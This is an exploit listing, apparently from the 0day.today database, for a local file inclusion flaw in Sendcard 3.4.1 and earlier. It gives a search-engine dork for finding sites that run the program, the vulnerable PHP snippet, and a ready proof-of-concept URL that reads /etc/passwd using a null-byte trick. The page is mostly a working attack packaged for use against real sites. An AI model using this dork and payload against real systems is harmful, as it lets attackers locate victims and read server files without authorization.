[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sendcard <= 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability

Author
ettee
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1811
Category
web applications
Date add
30-04-2007
Platform
unsorted
========================================================================
Sendcard <= 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability
========================================================================



Sendcard  (sendcard.php) Sendcard Local File Inclusion Vulnerability

Discovered: ettee
Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org
         "powered by Sendcard"

Bug:
"// Get the template details
if(!isset($form) || $form == ''){
    $form = "form";
}
if(!isset($des) || $des == ''){
    $des = "card";
}
if (!isset($template) || $template == '') {
    $template = 'message';
}"

PoC:
http://[site]/[path]/sendcard.php?form=/etc/passwd%00



#  0day.today [2024-11-16]  #